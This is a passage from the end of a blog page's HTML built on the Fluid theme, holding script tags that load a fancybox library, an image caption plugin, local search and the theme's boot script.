        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
